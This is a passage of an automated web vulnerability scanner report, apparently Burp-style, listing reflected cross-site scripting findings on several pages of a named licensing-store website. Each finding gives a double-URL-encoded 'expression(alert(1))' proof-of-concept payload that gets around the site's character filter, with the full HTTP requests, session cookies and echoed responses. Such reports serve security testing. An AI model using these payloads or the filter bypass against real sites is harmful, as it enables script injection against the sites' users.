Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId3=rnoX2q9XAatYKaJC; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.5.10.1290274971

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:26:41 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1590849948:73686F702D6A6176613034302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=SdVvMySB3Lk078zgYBZBbbwlF0fLGkCM8H2gH6lYTGDsvGpp492bvrlGv0xL5vx1JpQJbQLSncmyJLPQvQvfThBfFrbgGny0JgK2GpHjpyyy9sqb1VPgZLG4lmxzRXq3!-639703385; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:26:44 GMT; path=/
Set-Cookie: NS_VER=2010.2.0; domain=www.turnerlicensing.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 41738


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Homepage - Turner</title>


<meta name=...robots... content=...NOODP,NOYDIR...>
<script language='JavaScript'
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?c93f8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271465883b49a=1&renderableItem=%2Fshow%2F15&c93f8'style='x:expression(alert(1))'1465883b49a=1&c93f8%27style%3d%27x%3aexpression%28alert%281%29%29%271465883b49a=1'>
...[SNIP]...

1.77. http://www.turnerlicensing.com/s.nl/sc.34/.f [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /s.nl/sc.34/.f

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c55d7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276061abd1262 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c55d7'style='x:expression(alert(1))'6061abd1262 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /s.nl/sc.34/.f?ck=rnoX2q9XAatYKaJC&vid=rnoX2kNXAZKv7gpK&cktime=87993&cart=148243&chrole=17&c55d7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276061abd1262=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:54:58 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:54:59 GMT
NS_RTIMER_COMPOSITE: 1913753260:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=JnhLMyZCTGTYmH1MK7KMZnCLywygTgNdR0rzQSptFDF9nRrLZ9c1mChTpGhH71kG2YDzb9LSyF1FkPhsjp9YNZ73s1520jhG973y1b1HTLnT4FW0x1NSv9b0sWHPyXT8!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:55:14 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=878
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 54415


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Shopping Cart - Turner</title>


<meta name="robots" content="noindex,nofollow">
<script language='JavaScript'
...[SNIP]...
on%2528alert%25281%2529%2529%25276061abd1262=1&c55d7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276061abd1262=1&c55d7%27style%3d%27x%3aexpression%28alert%281%29%29%276061abd1262=1&c55d7'style='x:expression(alert(1))'6061abd1262=1'>
...[SNIP]...

1.78. http://www.turnerlicensing.com/teams_by_state/Alabama [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Alabama

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bd71c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b08045fc3e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bd71c'style='x:expression(alert(1))'b08045fc3e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Alabama?bd71c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b08045fc3e2=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:52 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:52 GMT
NS_RTIMER_COMPOSITE: -109256382:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=981
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110364


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Alabama</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
nsing.com/s.nl?sc=77&category=175313&bd71c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b08045fc3e2=1&bd71c%27style%3d%27x%3aexpression%28alert%281%29%29%27b08045fc3e2=1&fromsla=T&bd71c'style='x:expression(alert(1))'b08045fc3e2=1'>
...[SNIP]...

1.79. http://www.turnerlicensing.com/teams_by_state/Alaska [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Alaska

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4d41a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275bce84a02ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d41a'style='x:expression(alert(1))'5bce84a02ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Alaska?4d41a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275bce84a02ce=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:41 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:34 GMT
NS_RTIMER_COMPOSITE: 2001989218:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=948
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 76541


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Alaska</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<sc
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=260041&4d41a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275bce84a02ce=1&4d41a'style='x:expression(alert(1))'5bce84a02ce=1&4d41a%27style%3d%27x%3aexpression%28alert%281%29%29%275bce84a02ce=1&fromsla=T'>
...[SNIP]...

1.80. http://www.turnerlicensing.com/teams_by_state/Arizona [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Arizona

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a0e30%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d86d71a4401 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0e30'style='x:expression(alert(1))'d86d71a4401 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Arizona?a0e30%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d86d71a4401=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:47 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:45 GMT
NS_RTIMER_COMPOSITE: -2034791080:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=839
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110717


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Arizona</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175347&a0e30%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d86d71a4401=1&a0e30'style='x:expression(alert(1))'d86d71a4401=1&fromsla=T&a0e30%27style%3d%27x%3aexpression%28alert%281%29%29%27d86d71a4401=1'>
...[SNIP]...

1.81. http://www.turnerlicensing.com/teams_by_state/Arkansas [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Arkansas

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1396a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276e71f63c249 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1396a'style='x:expression(alert(1))'6e71f63c249 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Arkansas?1396a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276e71f63c249=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:47 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:45 GMT
NS_RTIMER_COMPOSITE: -259188253:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=974
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110280


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Arkansas</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175348&1396a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276e71f63c249=1&1396a'style='x:expression(alert(1))'6e71f63c249=1&fromsla=T&1396a%27style%3d%27x%3aexpression%28alert%281%29%29%276e71f63c249=1'>
...[SNIP]...

1.82. http://www.turnerlicensing.com/teams_by_state/Calgary [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Calgary

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7cdd3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d075c1b2de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7cdd3'style='x:expression(alert(1))'8d075c1b2de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Calgary?7cdd3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d075c1b2de=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:45 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:45 GMT
NS_RTIMER_COMPOSITE: 2001990455:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=842
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 98472


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Calgary</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=260059&7cdd3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d075c1b2de=1&7cdd3'style='x:expression(alert(1))'8d075c1b2de=1&7cdd3%27style%3d%27x%3aexpression%28alert%281%29%29%278d075c1b2de=1&fromsla=T'>
...[SNIP]...

1.83. http://www.turnerlicensing.com/teams_by_state/California [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/California

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e8313%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773dad229e98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8313'style='x:expression(alert(1))'73dad229e98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/California?e8313%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773dad229e98=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:50 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:45 GMT
NS_RTIMER_COMPOSITE: -1590889426:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=824
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111521


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>California</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175355&e8313%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773dad229e98=1&e8313%27style%3d%27x%3aexpression%28alert%281%29%29%2773dad229e98=1&e8313'style='x:expression(alert(1))'73dad229e98=1&fromsla=T'>
...[SNIP]...

1.84. http://www.turnerlicensing.com/teams_by_state/Colorado [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Colorado

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 43f2c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252725987bedbdc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43f2c'style='x:expression(alert(1))'25987bedbdc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Colorado?43f2c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252725987bedbdc=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:55 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:52 GMT
NS_RTIMER_COMPOSITE: 334644940:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=960
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110761


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Colorado</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175356&43f2c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252725987bedbdc=1&43f2c%27style%3d%27x%3aexpression%28alert%281%29%29%2725987bedbdc=1&43f2c'style='x:expression(alert(1))'25987bedbdc=1&fromsla=T'>
...[SNIP]...

1.85. http://www.turnerlicensing.com/teams_by_state/Connecticut [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Connecticut

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6b72d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527146d7de1dc2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6b72d'style='x:expression(alert(1))'146d7de1dc2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Connecticut?6b72d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527146d7de1dc2=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:42 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:34 GMT
NS_RTIMER_COMPOSITE: 1666343690:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=984
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 81996


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Connecticut</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script
...[SNIP]...
nsing.com/s.nl?sc=77&category=175359&6b72d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527146d7de1dc2=1&6b72d%27style%3d%27x%3aexpression%28alert%281%29%29%27146d7de1dc2=1&fromsla=T&6b72d'style='x:expression(alert(1))'146d7de1dc2=1'>
...[SNIP]...

1.86. http://www.turnerlicensing.com/teams_by_state/Delaware [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
